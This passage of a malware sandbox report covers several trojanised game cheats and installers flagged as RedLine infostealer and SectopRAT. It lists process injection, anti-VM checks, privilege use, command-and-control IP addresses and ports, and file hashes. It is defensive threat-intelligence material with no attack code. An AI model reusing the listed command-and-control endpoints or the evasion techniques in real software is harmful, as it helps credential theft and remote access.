PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

Processes

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
DE 136.244.80.139:40533 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
DE 136.244.80.139:40533 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp

Files

memory/3880-0-0x0000000074B3E000-0x0000000074B3F000-memory.dmp

memory/3880-1-0x0000000000460000-0x00000000004FA000-memory.dmp

memory/3880-2-0x0000000004E60000-0x0000000004ED6000-memory.dmp

memory/3880-3-0x00000000029C0000-0x00000000029DE000-memory.dmp

memory/3880-4-0x0000000074B30000-0x00000000752E0000-memory.dmp

memory/3880-5-0x00000000055C0000-0x0000000005B64000-memory.dmp

memory/3656-6-0x0000000000400000-0x000000000041E000-memory.dmp

memory/3880-9-0x0000000074B30000-0x00000000752E0000-memory.dmp

memory/3656-10-0x0000000074B30000-0x00000000752E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CSGO FREE HACK.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/3656-11-0x0000000005290000-0x0000000005322000-memory.dmp

memory/3656-13-0x00000000054C0000-0x00000000054D2000-memory.dmp

memory/3656-12-0x0000000006300000-0x0000000006918000-memory.dmp

memory/3656-14-0x0000000006070000-0x00000000060AC000-memory.dmp

memory/3656-15-0x00000000061C0000-0x000000000620C000-memory.dmp

memory/3656-16-0x0000000074B30000-0x00000000752E0000-memory.dmp

memory/3656-17-0x0000000007C90000-0x0000000007D9A000-memory.dmp

memory/3656-18-0x0000000074B30000-0x00000000752E0000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Installer.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3916 set thread context of 4476 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\Installer.exe"

C:\Users\Admin\AppData\Local\Temp\Installer.exe

C:\Users\Admin\AppData\Local\Temp\Installer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 12

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/3916-0-0x00000000752CE000-0x00000000752CF000-memory.dmp

memory/3916-1-0x0000000000800000-0x0000000000912000-memory.dmp

memory/3916-2-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/3916-3-0x0000000005940000-0x0000000005EE4000-memory.dmp

memory/3916-4-0x0000000005390000-0x0000000005422000-memory.dmp

memory/3916-5-0x0000000005350000-0x000000000535A000-memory.dmp

memory/3916-6-0x00000000056F0000-0x0000000005712000-memory.dmp

memory/4476-7-0x0000000000400000-0x0000000000420000-memory.dmp

memory/3916-9-0x00000000752C0000-0x0000000075A70000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2996 set thread context of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2996 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
RU 109.248.201.150:63757 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
RU 109.248.201.150:63757 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
RU 109.248.201.150:63757 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp

Files

memory/2996-0-0x00000000753AE000-0x00000000753AF000-memory.dmp

memory/2996-1-0x0000000000AD0000-0x0000000000C14000-memory.dmp

memory/2996-2-0x0000000005B10000-0x00000000060B4000-memory.dmp

memory/2996-3-0x0000000005600000-0x0000000005692000-memory.dmp

memory/2996-5-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/2996-4-0x00000000056C0000-0x00000000056CA000-memory.dmp

memory/2996-6-0x00000000753AE000-0x00000000753AF000-memory.dmp

memory/2996-7-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/2996-8-0x0000000005740000-0x0000000005762000-memory.dmp

memory/2996-9-0x00000000057E0000-0x0000000005856000-memory.dmp

memory/2996-10-0x0000000005860000-0x000000000587E000-memory.dmp

memory/2180-11-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2996-13-0x00000000753A0000-0x0000000075B50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Minecraft_v4.5.exe.log

MD5 fb3264819f05b468156e37fecd7ca1e7
SHA1 8461be627ec2c21766472ac5a9215204f6cd03d6
SHA256 902e22368b4d29d67c78eb445d67c7e36001a79c7701a1e171a9c7af457a739c
SHA512 ddcb2a199799dc30a5627d6bb2aff30aca350b52e15f574ecc9e9e9e4d388fd1fe808b5fd2a8ea7015c91e369a06f045be455bf070c6d20d8c3b1c06de8ef964

memory/2180-15-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/2180-17-0x00000000051D0000-0x00000000051E2000-memory.dmp

memory/2180-16-0x0000000005790000-0x0000000005DA8000-memory.dmp

memory/2180-18-0x0000000005230000-0x000000000526C000-memory.dmp

memory/2180-19-0x0000000005270000-0x00000000052BC000-memory.dmp

memory/2180-20-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/2180-21-0x00000000054E0000-0x00000000055EA000-memory.dmp

memory/2180-22-0x00000000753A0000-0x0000000075B50000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bird.exe"

Signatures

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Bird.exe

"C:\Users\Admin\AppData\Local\Temp\Bird.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
FI 65.21.103.71:56458 tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
FI 65.21.103.71:56458 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 73.209.201.84.in-addr.arpa udp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp

Files

memory/4156-0-0x0000000000780000-0x0000000000DDE000-memory.dmp

memory/4156-1-0x0000000076370000-0x0000000076371000-memory.dmp

memory/4156-2-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-3-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-4-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-8-0x0000000000780000-0x0000000000DDE000-memory.dmp

memory/4156-9-0x0000000005FA0000-0x0000000006544000-memory.dmp

memory/4156-10-0x0000000006B70000-0x0000000007188000-memory.dmp

memory/4156-11-0x0000000005AD0000-0x0000000005B62000-memory.dmp

memory/4156-12-0x0000000005A80000-0x0000000005A92000-memory.dmp

memory/4156-13-0x0000000005BB0000-0x0000000005BEC000-memory.dmp

memory/4156-14-0x0000000005F10000-0x0000000005F5C000-memory.dmp

memory/4156-15-0x00000000069F0000-0x0000000006AFA000-memory.dmp

memory/4156-16-0x0000000000780000-0x0000000000DDE000-memory.dmp

memory/4156-17-0x0000000076370000-0x0000000076371000-memory.dmp

memory/4156-18-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-19-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-20-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-21-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-23-0x0000000076350000-0x0000000076440000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

136s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

System Binary Proxy Execution: Regsvcs/Regasm

defense_evasion
Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
Key opened \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1636 set thread context of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1636 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp

Files

memory/1636-0-0x0000000074DCE000-0x0000000074DCF000-memory.dmp

memory/1636-1-0x0000000000350000-0x00000000003AC000-memory.dmp

memory/1636-2-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/1200-5-0x0000000002970000-0x00000000029B0000-memory.dmp

